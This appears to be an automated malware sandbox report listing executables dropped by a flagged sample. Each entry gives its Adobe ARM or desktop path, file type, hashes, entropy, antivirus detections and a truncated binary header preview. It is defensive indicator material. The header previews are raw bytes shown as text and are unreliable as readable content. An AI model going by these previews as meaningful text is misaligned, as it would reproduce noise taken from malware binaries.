                                                                                                                                                        SHA1:8DE806C3C9E7A5187435F310EAFA818D35C71996
                                                                                                                                                        SHA-256:7679204C091C5476338AE5217C35FA3106E307613CA3CCED2A9171EFFD8B678B
                                                                                                                                                        SHA-512:1001E7BCD77A36D153DED6BBB37FB2ACD9D9C94FF52A63BE19684BFDF3D67530D48402B20127C3D3DF5D656647A1B6D450C4A340AB966AC8704169DA6A296826
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1400832
                                                                                                                                                        Entropy (8bit):4.651221497062525
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CYUcknS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CZcknSLNiXicJFFRGNzj3
                                                                                                                                                        MD5:9371DCB62CAA717F94B15599C7C75CAB
                                                                                                                                                        SHA1:DB19586F7A4A434BD7B89AC216E22BEC30AF836F
                                                                                                                                                        SHA-256:C2E54D59E0C682BB3C2172EF3B35E3CFB6B67A3661F731A7AAE9706BDCA95D30
                                                                                                                                                        SHA-512:2FA88FC628174BC0D55B4A40201B8311F58E9647F32655DD77D53083EA3FD9EEFD32D0EDEBF43F6EE90BEB621BBB9F3099DA16D07DF8BA1651D5EB543CAF4359
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P ..............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                        Entropy (8bit):7.159455983011428
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:N56AqSPyC+NltpScpzbtvpJoMQSq/jrQaSwLNiXicJFFRGNzj3:ESktbpS7wRGpj3
                                                                                                                                                        MD5:18EA24C807B44977B93382D308D3E3AB
                                                                                                                                                        SHA1:72F3E1AC66D1700B7787EC50CBC711CFAE675DFD
                                                                                                                                                        SHA-256:71EFE3F34DBCAEB4A95C77E512EF284C9AB8672000C46ACCB663CEB2F8B5C98F
                                                                                                                                                        SHA-512:15D4562C67B0CA112AAFFF9134C9DEFEDBD8198B3D97694F66378373BB7520C57CB82E559D4401C2E892A24A4B5675FACFB7DAC6BAED529A35B1C4581E866744
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................z.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                        Entropy (8bit):7.089727879117695
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:OGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLDLNiXicJFFRGNzj3:q4OEtwiICvYM3fj7wRGpj3
                                                                                                                                                        MD5:2473678B3729C6B8D0312DA6B73CD7F9
                                                                                                                                                        SHA1:36592B00EB58DB08E1DE1ED44E1318645C159B1B
                                                                                                                                                        SHA-256:7E265E7524318D036C290FD803C98472C6DBED17F7FC41597362ED7F14B2169F
                                                                                                                                                        SHA-512:FA76E9FCB62296E3F4DFC9EACB1D72DC0DB29441F7E7A2C16D18F08EC5779AA1E77F96776EC573658CCB740351A8735277B7C742E75D0FDEF41C4C4AD2A1306F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1641472
                                                                                                                                                        Entropy (8bit):5.075012588737659
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:0AMvR+3kMbVjhI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tE+lbVjhILNiXicJFFRGNzj3
                                                                                                                                                        MD5:D6567CD0E84A7BF4C8A7A6B04105D895
                                                                                                                                                        SHA1:2DBACFE414F653E83A4501659E5F4173366B210B
                                                                                                                                                        SHA-256:475B633A3CA44922AD53BB0BBF1E70F430B417C8D495505297E2E348128938F5
                                                                                                                                                        SHA-512:5AE00A1DDCFBC202D180485C9A88AF786C45795D6B51DFD1AD3D0D883DDB6D7EC40D9DDC4A6881E0185E998CBD4BDE768463F208BBCF65A26E66DC7AF5EAFE0A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $......".......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1445888
                                                                                                                                                        Entropy (8bit):4.810173195982104
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:0xGBcmlV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gGy+VLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E5F7971641A9B95E117EDC9226944C29
                                                                                                                                                        SHA1:B4426DB643E9CD99DBED0BEB000B7BC5CF6580BE
                                                                                                                                                        SHA-256:8A7AED34C8C795A416DE237E74A0CA312DA3C359C97D296796FA467C8E5B181E
                                                                                                                                                        SHA-512:95061EDCD4FE7250D36C9CD36172C347D5C7321080E9F6E54B8B45C5F1D3612ED7E172D22618764D46EC0910FA8D019671C7FC4AD5BBEEC069EABB1E6BED3109
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.............................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1800192
                                                                                                                                                        Entropy (8bit):5.30216581700524
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:A0vHyTLj8trn3wsi/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BWj4rgsiLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E3465EB8878EE1D8832BE40389C56493
                                                                                                                                                        SHA1:C1BFA617F35DF853D7212C375D551FD908BC9F1F
                                                                                                                                                        SHA-256:662F675B973284BBE8ABB58BF752A123E230D107F56CC5D57E42116AB8983967
                                                                                                                                                        SHA-512:90B7DBE7C95A169D438C12E8A6069EEEA3DA7E2A32C1475C16031AFD3C1EE69CED3CF74EA16D181DA68B4DE1A89969C0193A4D4A945EB641279736532265DCC5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&.....^.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1781760
                                                                                                                                                        Entropy (8bit):7.271319936127489
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:e4ijwGJra0uAUfkVy7/ZTLNiXicJFFRGNzj3:eNjwGJrakUQyB7wRGpj3
                                                                                                                                                        MD5:92EE4042F876280658E88591460DB8B8
                                                                                                                                                        SHA1:0C1B8CEA6840DC10E728DC33A41B199CFF26990E
                                                                                                                                                        SHA-256:350C9B4B53B62B5A26735F21635FC8FC6179F0B0464760BA7DCA65DFAA72BF21
                                                                                                                                                        SHA-512:3226BF033CC9A201BD7349473081AF0C9C54745B7B1E5314EA138D2D2AEC053235B107BC9A17DCFD52EA09CCABCF7E956EFEEB10CB5E2BFDFC01F32BDC324422
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1318400
                                                                                                                                                        Entropy (8bit):7.438343941040939
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:UeR0gB6axoCxyR6RLQRF/TzJqe58BimA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ggHxWR6uBTzge5MimALNiXicJFFRGNzb
                                                                                                                                                        MD5:A687509E418413F1E8B703035D50220A
                                                                                                                                                        SHA1:82231A98E248519FB0542EE34C189AD16065D199
                                                                                                                                                        SHA-256:14A60965CF6F2729CCFAA6E8222149C7C0F60F3549B3CCB40C3D52C2C3490C36
                                                                                                                                                        SHA-512:E06A82A7D7382BD943DDA1DABF2F08E01D2C9AFDFEFE060BC7AC6DC9254615B6A61AE7678FA3C9D9BCEE9BA16870DD2920A7909C1D04B1CFCF6E345781D2FBE0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......u......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                        Entropy (8bit):4.9948972641065605
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+pwOtO7y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+mOtmyLNiXicJFFRGNzj3
                                                                                                                                                        MD5:3B5EAF51A85BB9E1350C478C56C21C7D
                                                                                                                                                        SHA1:13CDB8DB12D0BD230E403DAC6EFCF927850EF2BE
                                                                                                                                                        SHA-256:14A0D076C6E83CDF5803DB073E4E594F28AEE206A21F949A7087F20AEFDC8492
                                                                                                                                                        SHA-512:CE6E59D0C22F06B6A302CF558F20B1CFEBB4FB3E22A36D2913BC9C97991F810181A708E625F253340734B72CAC3AA19517C26EE2C9B2ADE705878D9328EF71D5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                        Entropy (8bit):4.9955892559353625
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:HKU/h/4KF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Hr/VFLNiXicJFFRGNzj3
                                                                                                                                                        MD5:F5FDABD29CFC8B81BC6BC13EB529B358
                                                                                                                                                        SHA1:715FF08FCE5CDBDBD5619D0A2F9D4D0DD5F4B210
                                                                                                                                                        SHA-256:9DD12B6C7DA5A4C3FC57C7D254D9ED4C9B0B39DF9537E0B67C4F1ACDD3EAC51D
                                                                                                                                                        SHA-512:535B28E9E29B169C1EB5E99D013046DD6FCEBEB520EE57D46B75960DD8D5D1E1FE074A181160528E6E3FB227F89E317C37B2C558913FB806DECF8FE0A71EBB7A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"......{.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1669632
                                                                                                                                                        Entropy (8bit):5.069202342314912
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Ex7YiBLZ05jNTmJWEx+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ExUiHIjNg+LNiXicJFFRGNzj3
                                                                                                                                                        MD5:75FA64D6BD39AE5DFA8154D69B9D7B6A
                                                                                                                                                        SHA1:01D3AD0197B29023DFEEEA5C99F838D505A387F1
                                                                                                                                                        SHA-256:A078AA598091FC9B653548A0F6A606D99B15D8798AA1341F8377478A93ED1D6A
                                                                                                                                                        SHA-512:2E14C25153F74321E39064000AB03F5807D5600395F19E46B3D9192E8A7A8A2A752C146A550EEA27DD8AD119F9F5E201B1ED1C0E6EB1F8977857CD6AAE55373A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574912
                                                                                                                                                        Entropy (8bit):5.0273572112095
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ylnRkld6fgJcEwixI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mokfgJcEwCILNiXicJFFRGNzj3
                                                                                                                                                        MD5:5381FF9C4BA0B234A4A6E74E9E9D62EB
                                                                                                                                                        SHA1:26D6F249D5D031BF18421467A460A15190AD1DB4
                                                                                                                                                        SHA-256:F1541799DF4E74FABF99E2569A4032B8FADE4BCE912B1868B2F1B363820A279A
                                                                                                                                                        SHA-512:93FDD4A79475BE903450ED52EBC543EDDC239F139BCF22672A269334494C14A918EE80EDCB962B7C5E303F64A67892D429528A568FC1FE6A6ACF87B00C671693
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#.............................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1677824
                                                                                                                                                        Entropy (8bit):5.084981361423628
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:EWR5k8hb0Haw+x4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EWLk8SHawm4LNiXicJFFRGNzj3
                                                                                                                                                        MD5:0F760BD38505DA17AAE7BBB3DA03F586
                                                                                                                                                        SHA1:5AFA63EFA525B3E21E250428DCB6FEFE03550870
                                                                                                                                                        SHA-256:421E19E670B868088EDCB9E38954EE6276A6F71907055597A68B4BBAFE9A8916
                                                                                                                                                        SHA-512:2270C0ADE83FCA96D9D2E5407341CFF80DAFE4EE12BCC976BEFD11007FF4319FB03D0B804CEBBAD0EF87BAAC8C3EB70FE1765C43C231BEBBB132071D1727C576
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$......Y.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1437696
                                                                                                                                                        Entropy (8bit):4.7009436635444155
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:1kCKABQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1xKkQLNiXicJFFRGNzj3
                                                                                                                                                        MD5:96A59B342259BBF378F092530ED787DC
                                                                                                                                                        SHA1:37AC44D15BCE0040BF755079CFFDE336089BD779
                                                                                                                                                        SHA-256:628E5C19D18A26D832F8B562EE779C03DB0BCC7FEF7CF2AEED26C35A9EFC7956
                                                                                                                                                        SHA-512:2A89D0F330DF0DA3D4322D3F5BCED9BBA3F716E270125E021F347501E002792101FC0BD64F6D44DC5BDF3E16CF3B511D558FE7363BE1ACE9D39F474ABF8171BB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... ......g......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                        Entropy (8bit):4.680860182182028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ljNWBPn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NNmfLNiXicJFFRGNzj3
                                                                                                                                                        MD5:8254267FEEA85785A515081FB62CCED1
                                                                                                                                                        SHA1:F43B79025A8C56966C69B837124EB159E1376890
                                                                                                                                                        SHA-256:7735F0B7F3B20BC8611F87412E7315B488BCF175A8D99184856AAE97563FF174
                                                                                                                                                        SHA-512:EA5CD131B24AAE5C03F0820ACE392AE39C07F17AF632389FB0131548A56D69C4C7A9339E37E543A692005FA3BCE9250E51F2685C5FEAF1622801EA40E8E5AC34
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... .....q........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1458176
                                                                                                                                                        Entropy (8bit):4.778588756114181
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:7ijRyhdsRrZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7ijsoRZLNiXicJFFRGNzj3
                                                                                                                                                        MD5:C712181DC0AE2ADFDCB8D7EB514AB2D1
                                                                                                                                                        SHA1:E6AD20B1D0A396ED2D3205BFDD7FEB18598C9B7C
                                                                                                                                                        SHA-256:B8465BDAD3D09B4EC98E2D6E94EC30D1A663F74F508FBFF2187A3525BDF6E078
                                                                                                                                                        SHA-512:2D57E5C6CB01283EF4F705AFAC139AA501F0645388D0CAB2C2E68B337F26B5FFFCB23961E04C70365BD5719C5225C35E0482D4EEA8F2E9FFC15ED975ECEF8EB3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!..... ..... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................
